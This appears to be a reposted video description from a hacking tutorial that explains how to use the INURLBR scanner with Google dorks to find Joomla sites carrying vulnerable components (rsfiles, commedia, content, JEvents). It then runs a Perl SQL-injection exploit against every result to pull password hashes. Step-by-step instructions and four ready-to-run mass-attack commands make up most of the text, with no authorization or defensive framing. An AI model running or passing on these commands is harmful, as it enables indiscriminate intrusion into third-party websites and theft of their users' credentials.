Videos

Published on April 18th, 2017 📆 | 7422 Views ⚑

0

SCAN JOOMLA SQL INJECTION & MASS SCAN INURLBR EXPLOIT.Joomla.pl 2017


iSpeech


####################################################
# SCAN JOOMLA SQL INJECTION & MASS SCAN INURLBR
# AUTHOR SCANNER: INURLBR
# AUTOR EXPLOIT: BRAZILIANS HACK TEAM
# GOOGLE DORKS: inurl:option=com_rsfiles
# inurl:option=com_commedia
# inurl:option=com_content
# inurl:option=com_events
####################################################
# [ + ] EXPLOITS:
# https://www.exploit-db.com/exploits/2... - Joomla! Component 'com_rsfiles' - 'cid' Parameter SQL Injection
# https://www.exploit-db.com/exploits/2... - Joomla! Component 'com_commedia' - 'task' Parameter SQL Injection
# https://www.exploit-db.com/exploits/6... - Joomla! Component 'com_content' 1.0.0 - 'itemID' SQL Injection
# https://packetstormsecurity.com/files... - Joomla JEvents 1.5.0 SQL Injection
#
####################################################
# EXPLANATION OF SCAN FUNCTIONS USED PREVIOUSLY:
#
# --dork = TO REACH POSSIBLY VULNERABLE SITES
# -q = Difine Bots OF Searching for (YAHOO, BING, GOOGLE, ETC..)
# -s = NAME OF THE PASTE WHERE THE VUL MAY BE SAVED
# --command-all = USE THIS COMMAND TO SPECIFY A SINGLE COMMAND TO EACH URL FOUND.
# --unique = FILTER RESULTS IN UNIQUE DOMAINS
#
# MORE ABOUT INURLBR PROJECTS

# EMAIL: inurlbr@gmail.com
# Blog: http://blog.inurl.com.br
# TT: https://twitter.com/googleinurl
# FB: https://fb.com/InurlBrasil
# PTB: http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/g...
# YB: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
# IRC: irc.inurl.com.br / #inurlbrasil
#
####################################################
#
# EXPLOIT SCAN = http://pastebin.com/WD0rP6pN
#
# SCANNER = https://github.com/googleinurl/
#
####################################################
# SIMPLE TUTORIAL:
#
# 1º OPEN THE TERMINAL AND GO TO THE SCANNER FOLDER (INURLBR)
# 2º COPY THE "INURLBR COMMAND" AND ENTER (TBM HAVE THE MANUAL WAY IF YOU WANT) [LET THE EXPLOIT IN THE INURLBR
SCANNER FOLDER TO BE MORE EASY]
# $ GOOD LET YOU MORE THAN 1 COMMAND SINCE SCAN HAS MORE THAN ONE FUNCTION, THE FUNCTIONS WOULD BE ...
# [ 1 - JOOMLA COMPONENT RSFILES ]
# [ 2 - JOOMLA COMPONENT COMMEDIA + CONTENT ]
# [ 3 - JOOMLA COMPONENT JEVENTS ]
#
# 3º WAIT SCAN SEARCH AND CHECK ...
# 4º FOR VUL SITE WILL APPEAR IN ROSA + HASH
# SE THE SITE IS NOT VUL IS GOING TO BE GRAY OR RED AND THE EXPLOIT WILL GIVE AS "PASSWORD NOT FOUND"
# 5º /NOME_DA_SUA_PASTA/output = LOCAL PATTERN WHERE VUL'S WERE SAVED
#
#
# IN THE VIDEO I WILL ONLY USE 3 SEARCH ENGINES FOR THE RIGHT PROCESS, YOU CAN DO WITH ALL
# JUST A "-q 2,3,4" POR "-q all" THAT THE SCANNER WILL MAKE SEARCH ON ALL ENGINES
#
#
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||
[+] INURLBR commands:
[+] php inurlbr.php --dork 'inurl:option=com_rsfiles' -q 2,3,4 -s rsfiles.txt --command-all 'perl joomla.pl _TARGET_ 1' --unique
[+] php inurlbr.php --dork 'inurl:option=com_commedia' -q 2,3,4 -s commedia.txt --command-all 'perl joomla.pl _TARGET_ 2' --unique
[+] php inurlbr.php --dork 'inurl:option=com_content' -q 2,3,4 -s content.txt --command-all 'perl joomla.pl _TARGET_ 2' --unique
[+] php inurlbr.php --dork 'inurl:option=com_events' -q 2,3,4 -s event.txt --command-all 'perl joomla.pl _TARGET_ 3' --unique
[+]
|---------------------------------------------------|
####################################################
# CONTACT : Kyxrec0n
####################################################


2017-04-18 12:24:14

source





Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑